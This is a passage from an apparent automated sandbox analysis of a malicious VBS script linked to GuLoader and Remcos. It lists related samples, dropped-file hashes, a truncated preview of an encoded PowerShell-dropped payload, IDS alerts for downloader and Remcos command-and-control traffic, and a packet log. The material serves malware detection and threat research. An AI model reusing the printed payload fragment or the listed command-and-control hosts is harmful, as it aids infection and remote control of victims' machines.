                                                                  • 104.21.86.72
                                                                  TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.86.72
                                                                  Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                  • 104.21.86.72
                                                                  37f463bf4616ecd445d4a1937da06e19DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 104.21.86.72
                                                                  Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.86.72
                                                                  LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                  • 104.21.86.72
                                                                  SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                  • 104.21.86.72
                                                                  http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                  • 104.21.86.72
                                                                  EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                  • 104.21.86.72
                                                                  Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.86.72
                                                                  ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                  • 104.21.86.72
                                                                  ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                  • 104.21.86.72
                                                                  REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 104.21.86.72
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):963
                                                                  Entropy (8bit):5.015524222686371
                                                                  Encrypted:false
                                                                  SSDEEP:12:tkluand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw+:qluWdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                  MD5:7FA5A8F58BDA67EC3B542E0D42C43D3D
                                                                  SHA1:8137240AAB00507EBBA1059ADFE30CC760E9C438
                                                                  SHA-256:64120964857BBF32FBA50281BB78C1E9C63CFD2C4BBC52CB3585EB6A10FE1075
                                                                  SHA-512:51666F671EB58525790D46BA6C3F42939643956E61993DD8267B9DEC91AB510A38423E55ABDA2198366F85D40D08B8D19145235BCF9F66B73964AAF52D7C8137
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):8003
                                                                  Entropy (8bit):4.840877972214509
                                                                  Encrypted:false
                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1628158735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulzh8//h:NllUu
                                                                  MD5:2D936C9957097D6631C64386010C648E
                                                                  SHA1:AD0125A442F7BD53E9959CB996B58A685B09B85E
                                                                  SHA-256:C93CB35DFCB4C1F5BD3B665C67D749E585887E56B9081D0E9FC47F54909E7119
                                                                  SHA-512:27B07DBB385D27EF522ED09079877C6EBE9444FBE1E4401AF8BABB4B2EE4FC1CF7BC1A09B31A3A52ACA217B40E2B8207A5441D04F1C6D9A44C05E51C4D49E4AB
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x586714a7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):17301504
                                                                  Entropy (8bit):0.8034358516829107
                                                                  Encrypted:false
                                                                  SSDEEP:6144:KdfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+2:IVQ4e81ySaKKjcrONseWe
                                                                  MD5:6A9A677B24FB783EB60A0DC398F972BB
                                                                  SHA1:2A4D0B136DC9AA99EE9A12C20EA8E93C02C1B0C8
                                                                  SHA-256:819C6D16146EE79C74E4FD10695E4550DAA51052FB91A7AE90ACCDFCFAE2DD6D
                                                                  SHA-512:3E4A89E42DC6F231C554FCF297675382AF15E4458E2FB1F17EA59FE787D1DF47E2FE677F9FDBE419A3FB892CC1C06A4918714DCABA7488786FF0A0BBADE31D11
                                                                  Malicious:false
                                                                  Preview:Xg..... .......;!......E{ow("...{........................@..........{U.-*...|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................*`J-*...|...................j.0-*...|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2
                                                                  Entropy (8bit):1.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Qn:Qn
                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                  Malicious:false
                                                                  Preview:..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):414892
                                                                  Entropy (8bit):5.9720377911805
                                                                  Encrypted:false
                                                                  SSDEEP:6144:AXnFTSXiXIj4NFrSkQyoohSle6QwnhabPWLkefxUkxXi+emlR4FCFIz885j/ng/y:sni8qors5o4leqnkWLJUkNyFCKz1Pg5Q
                                                                  MD5:FEA26DD912A1B2FBE245FB61CF1A2A1E
                                                                  SHA1:73D2B3A141136B446104D6C92FB6F4F021FAB924
                                                                  SHA-256:EED5FE194C635E8AD5871DCFEE9AEE934D2867A957D8CD047D73EA962A30AD89
                                                                  SHA-512:A995F95662A0D95C5624E39C53B60A3A039B46FA08B74AD44980DA868A7DEFBD8483C39AB762A394E0C689C3D425C9F644920500EE407C003841ED34B99C8877
                                                                  Malicious:false
                                                                  Preview:cQGbcQGbuy2cEwDrAkgw6wL/hgNcJARxAZtxAZu5Fvn4N3EBm3EBm4HxsY2NVnEBm3EBm4Hpp3R1YesCBu1xAZvrAjIOcQGbuiQls0ZxAZtxAZtxAZtxAZsxynEBm+sCPVKJFAtxAZvrAiVS0eJxAZvrAqrqg8EEcQGbcQGbgfmTplYEfM3rAqob6wJknotEJARxAZvrAoiaicPrAuflcQGbgcN0yw4E6wI1kOsCxXe6pVrcw+sCvuBxAZuB8ng+VfdxAZvrAsDigfLdZIk06wLiTesCmTfrAiLW6wICTHEBm+sCZ6uLDBDrAlMq6wIb0okME3EBm3EBm0JxAZvrAocegfoYRAQAddVxAZtxAZuJXCQMcQGb6wINtYHtAAMAAOsCM3VxAZuLVCQI6wJZBOsCW4GLfCQEcQGbcQGbietxAZtxAZuBw5wAAADrAsUQcQGbU3EBm+sCizRqQHEBm+sCUu2J63EBm+sCRnfHgwABAAAAUG0E6wKl2esCA6eBwwABAADrAphYcQGbU3EBm+sCy6mJ6+sCLJ7rAsV9ibsEAQAA6wL+VesC0RKBwwQBAADrAkt4cQGbU+sCzb/rAvAtav9xAZvrAtl4g8IF6wK7L+sCX1ox9nEBm+sCxCIxyXEBm+sC2+eLGnEBm3EBm0FxAZtxAZs5HAp19OsCl01xAZtGcQGb6wJUeIB8Cvu4dd5xAZvrApJ0i0QK/HEBm+sCx7Yp8HEBm3EBm//ScQGbcQGbuhhEBADrArWb6wK1iDHA6wIvv+sCAlqLfCQMcQGbcQGbgTQHpbIUi+sCit5xAZuDwARxAZtxAZs50HXlcQGbcQGbifvrAk1scQGb/9dxAZtxAZtNsBSLpTb60CxXnR7kTet0H0DRFuwz/hxQkEIKV5E1IYQz5vNXYsaicTmBylpN694sV620NZwSClv0NU+tM/3rvEDBCmS2nr9eM9W+WjzAD0J1UIalRKw3OTN4hqXY8C5VM2CGpT/D
                                                                  File type:ASCII text, with very long lines (350), with CRLF line terminators
                                                                  Entropy (8bit):4.9728595497248165
                                                                  TrID:
                                                                    File name:Reqt 83291.vbs
                                                                    File size:64'626 bytes
                                                                    MD5:67552a3cc2641ad2c640148836475c97
                                                                    SHA1:c35ae8937bbd48525c521fdb33aef88a1399bec0
                                                                    SHA256:ef0695bdd5f43136be86281b48a318c29b7d18268cca5e1956eff46ee655f858
                                                                    SHA512:b257ea0bfc83e38242602ccdaf33260d7003992930e3d1215535976cd51490f9dff608ede093d3e390b079bda48bf0ede40cfe63c480794b40931d965fe8b08c
                                                                    SSDEEP:1536:c/tTURy7UcHIBKNgJSxnsUlJkCwkHKPncWf5:axUkZIBxAxs7KK/cWx
                                                                    TLSH:8F534BA3EA68055B0D4E275DEDA46F52C6BCC104422328F1BEDD178DA04A89CF7BE31D
                                                                    File Content Preview:..'Billedlotterierne: haircut kuldsejles! henstilledes antitoksinet..'Remerging journaliseringsfunktionens, unsaint? udforskningerne;..'Sends! eppy. lovgennemgangs,..'Undervisningsmateriellers! sensibiliseret! guldgrubernes. helsingborgs. chefforhandlerne
                                                                    Icon Hash:68d69b8f86ab9a86
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-11T10:43:45.589743+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549761104.21.86.72443TCP
                                                                    2024-12-11T10:43:49.976531+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549772154.216.18.622404TCP
                                                                    2024-12-11T10:43:52.429673+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549778154.216.18.622404TCP
                                                                    2024-12-11T10:43:52.712659+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549779178.237.33.5080TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 11, 2024 10:43:03.349435091 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:03.349482059 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:03.349570990 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:03.356333971 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:03.356349945 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:04.645745039 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:04.645858049 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:04.691814899 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:04.691836119 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:04.692105055 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:04.741930008 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:04.760354042 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:04.807332039 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.320487976 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.320534945 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.320574045 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.320591927 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.321002007 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.321052074 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.321062088 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.322599888 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.322649956 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.322658062 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.328588009 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.328644037 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.328651905 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.336910963 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.336962938 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.336971045 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.382550955 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.382559061 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.429424047 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.439670086 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.491892099 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.512226105 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.516206026 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.516267061 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.516277075 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.524200916 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.524244070 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.524255037 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.532191038 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.532246113 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.532253981 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.547892094 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.547946930 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.547955036 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.555805922 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.555866003 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.555875063 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.563779116 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.563854933 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.563864946 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.571894884 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.571975946 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.571985006 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.579866886 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.579924107 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.579931021 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.586910009 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.586985111 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.586999893 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.632536888 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.704171896 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.706531048 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.706588030 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.706604958 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.714358091 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.714395046 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.714418888 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.714432955 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.714477062 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.718121052 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.721986055 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.722062111 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.722071886 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.731677055 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.731687069 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.731750011 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.731760025 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.740755081 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.740824938 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.740837097 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.740876913 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.740886927 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.750298977 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.750380039 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.750395060 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.750447989 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.759469986 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.759479046 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.759555101 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.768925905 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.768934965 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.768992901 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.773724079 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.773781061 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.783062935 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.783119917 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.792283058 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.792376041 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.898260117 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.898344994 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.903297901 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.903358936 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.910957098 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.911021948 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.914642096 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.914716005 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.921631098 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.921719074 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.928561926 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.928616047 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.932055950 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.932113886 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.939012051 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.939079046 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.945853949 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.945931911 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.952800989 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.952873945 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.956391096 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.956459999 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.963352919 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.963421106 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.970132113 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.970207930 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.973747015 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.973805904 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.980545044 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.980612040 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.987487078 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.987545967 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.991122007 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.991177082 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:05.998147964 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:05.998342037 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.088349104 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.088428020 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.093491077 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.093569040 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.096477032 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.096544981 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.101898909 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.101978064 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.104784966 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.104859114 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.109940052 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.110013008 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.114795923 CET44349704104.21.86.72192.168.2.5
                                                                    Dec 11, 2024 10:43:06.114856958 CET49704443192.168.2.5104.21.86.72
                                                                    Dec 11, 2024 10:43:06.117472887 CET44349704104.21.86.72192.168.2.5
